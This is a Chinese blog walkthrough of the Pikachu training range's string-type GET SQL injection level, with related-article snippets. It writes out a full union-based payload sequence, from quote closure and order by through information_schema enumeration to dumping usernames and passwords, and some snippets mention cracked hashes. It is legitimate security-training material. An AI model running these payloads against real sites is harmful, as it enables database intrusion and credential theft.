Pikachu靶场-SQL注入-字符型注入(get)过关步骤

最新推荐文章于 2024-05-14 10:08:56 发布
最新推荐文章于 2024-05-14 10:08:56 发布
阅读量850 收藏 8
点赞数 1
分类专栏: # 渗透靶场 文章标签: 安全 SQL注入 字符型注入 渗透测试 Pikachu靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44257023/article/details/125819697
版权

Pikachu靶场-SQL注入-字符型注入(get)过关步骤

这关的名字就可以看出,这关参数是字符串,提交方式是get提交,也就是说直接在浏览器地址栏里输入注入语句即可

判断是否存在注入点

在这里插入图片描述
这里输入要查询的用户名称,不知道用户名称都有什么,可以在数字型注入中查询一个,URL地址栏里的传参就两个 name= 和 submit ,submit 应该是提交自带的不用管它,但注入时不要删除掉,那么name这个参数就是注入点了
在这里插入图片描述
这关的闭合是点引号,然后 and -1=-1 和 and -1=-12判断注入点具体操作看动图:
在这里插入图片描述

判断有多少个字段数

使用 order by 判断字段数,这关的字段数是 2具体操作看动图:
在这里插入图片描述

展示显错位

知道了字段数,那么接下来就用union select 11,22 -- bbq 展示显错位了具体看动图:
在这里插入图片描述

查询当前数据库

version()查看数据库版本 ,database()查看当前数据库

union select version() ,database() -- bbq

操作看动图:
在这里插入图片描述

查询出数据库中的所有表

使用 union select table_name,22 from information_schema.tables where table_schema=database() -- bbq 得到当前数据库所有表名,具体看动图:
在这里插入图片描述

查询指定的表中的列名

查询出表名下一步就是,查询字段也就是列名称使用 union select column_name,22 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq 语句查询,具体看动图:
在这里插入图片描述

查询数据

当经过以上步骤,已经知道了数据库名、表名、字段名,那么就可以查询我们需要的数据了

union select username,password from users -- bbq

具体看动图:
在这里插入图片描述

常家壮
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pikachu靶场sql注入通关
oiadkt的博客
03-07 4471
pickchusql注入通关
Pikachu--字符注入(get)
XiaoYeZhu_1314的博客
01-03 582
1' union select 1,database() # 当前数据库。输入 1' and '1'='1 正确结果 判断为字符注入。发现1和2的位置都可以正确回显,1,2地方使用联合注入。输入vince' order by 1# 返回正确。输入vince' order by 2# 返回正确。输入1' and '1'='2 错误结果。输入 vince' order by 3#解密为:123456。解密为:000000。解密为:abc123。
Pikachu 靶场 SQL 注入通关解析
最新发布
Flag少侠的博客
05-14 1715
SQL注入是一种安全漏洞,它可以允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。这种漏洞通常出现在需要用户输入数据并将其作为SQL查询的地方,如登录表单、搜索功能、用户注册等。SQL注入的原理是应用程序没有充分验证和过滤用户输入,而是将用户输入直接拼接到SQL查询中,从而导致恶意的SQL代码被执行。攻击者可以通过注入恶意代码来绕过身份验证、获取敏感数据、修改数据库内容或执行其他未经授权的操作。
pikachu靶场字符注入(get)
ranioe的博客
12-08 3532
pikachu靶场字符注入(get) 字符注入 先找一个可以正确返回的内容 判断闭合条件 查询vince’报错 查询vince”没有报错 则说明是使用’闭合的。 把vince’构造可满足放回正确内容的语句 把vince’构造可满足放回正确内容的语句,在这个过程中可以利用and 1=1 和and 1=2 去判断是否构造成功 and 1=1 返回正常,and 1=2 查询不到用户。则说明构造成功了 查询字段数 查字段是否为2时,没有报错,查字段数是否为3时,报错。则说明字段数为2 查询回显位 语
pikachu sql注入 通关手册
tj2718647721的博客
08-07 685
手动方式:手工构造SQL语句进行注入点发现自动方式:采用自动扫描工具,自动进行注入点发现。
一文了解pikachuSQL注入
allintao的博客
03-01 2638
本文章主要讲解关于pikachu注入方式。目录一、数字注入(post)二、字符注入(get)三、搜索注入四、xx注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入中,我们可以使用FireFox浏览器或BurpSuite工具来测试字符注入,通过测试,我们可以确定注入点。 Pikachu靶场SQL注入是非常危险的一种攻击手段,Web开发者应该采取措施来防止SQL注入攻击。
sql注入 pikachu post数字注入
08-12
SQL 注入 Pikachu Post 数字注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字注入方法,即使用 ...
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
pikachu-master靶场
07-14
pikachu-master靶场
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
SQL注入漏洞攻防攻略大全
12-30
SQL注入漏洞攻防攻略大全 目录 SQL注入漏洞攻防攻略大全 1 (一) SQL注入漏洞全接触--入门篇 1 (二) SQL注入法攻击一日通 9 (三) SQL Server应用程序中的高级SQL注入 19 (四) 跨站式SQL注入技巧 25 (五) 编写通用的ASP防SQL注入攻击程序 28 (六) SQL注入攻击的原理及其防范措施 30 (七) 利用instr()函数防止SQL注入攻击 34
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2846
sql注入
SQL注入-Pikachu靶场通关
rumil的博客
08-21 2292
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu SQL注入 (皮卡丘漏洞平台通关系列)
热门推荐
箭雨镜屋
05-01 1万+
一、官方的戏精引言 本节引用来自pikachu漏洞靶场 哦,SQL注入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 ...
pikachu字符注入
m0_58887624的博客
11-09 1821
1.字符注入吧。直接就 1' 报错了 2.存在字符注入 3. 1' order by 1# 和 1' order by 2# 返回正常 3时报错。这样就知道了,字段数为2,两列数据 4. 确定一下字段的显示位置嘛。 1' union select 1,2# 5.查一下数据库名 1' union select database(),version()# /**数据库名和版本**/ 只有数据库5.0以上的版本,才会存在i...
NCNIPC--皮卡丘web靶场SQL注入字符注入
03-16 5103
我们打开我们的靶场,我们带着同学简单练习一个字符注入(get),点击SQL-Inject,点击字符注入(get),我们直接就测试一下输入1’如图所示。 点击“查询”按钮后,回显出报错了,报错信息为“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’’ at line 1”。 这
「渗透」:SQL注入新姿势:)
binaxin的博客
10-05 1432
由于一些机缘巧合,发现了一些SQL注入的新姿势,记录一下; 算是SQL注入的一种,叫wsdl注入,刚开始遇到比较新鲜,遂记录之。文笔不佳,包括注入理解都较为浅薄,各位大佬、师傅们见笑。 记录就是一个简单的练手记录,感觉非常有意思; 目标确定 在shodan、fofa上搜asmx,找到疑似存在wsdl注入的站(未授权),大概的是这样的:http://vuln_ip:8081/WebService1.asmx?WSDL,一般我们可以通过手工的方式去尝试注入,这样的站访问进去后是类似xml的文件,里面是各.
pikachusql注入
weixin_38720471的博客
01-07 3769
** 1原理 ** SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 2数字注入 让id=true,从而使sql语句在查询时,id可以查询所有值 3字符注入 3.1原理:首先用 ’ 判断是否存在字符注入的漏洞 。因为在sql语句中 多个’会造成sql语句错误(结合sql语句),若加单引号后显示sql运行错误 ,则存在此
pikachu靶场通关sql注入
08-10
Pikachu靶场中,SQL注入是一种常见的攻击方法。参与者可以通过注入恶意代码来绕过应用程序的安全性,从而获取敏感信息或者对数据库进行修改。在注入的过程中,可以使用不同的技术和payload来实现攻击。例如,数字注入字符注入、搜索注入、XX注入、insert注入、delete注入、http header注入、盲注和宽字节注入等。你也可以使用Python脚本来进行注入测试,根据注入和目标网址构造合适的payload来发送请求。123 #### 引用[.reference_title] - *1* [Pikachu靶场sql注入通关](https://blog.csdn.net/oiadkt/article/details/129385178)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值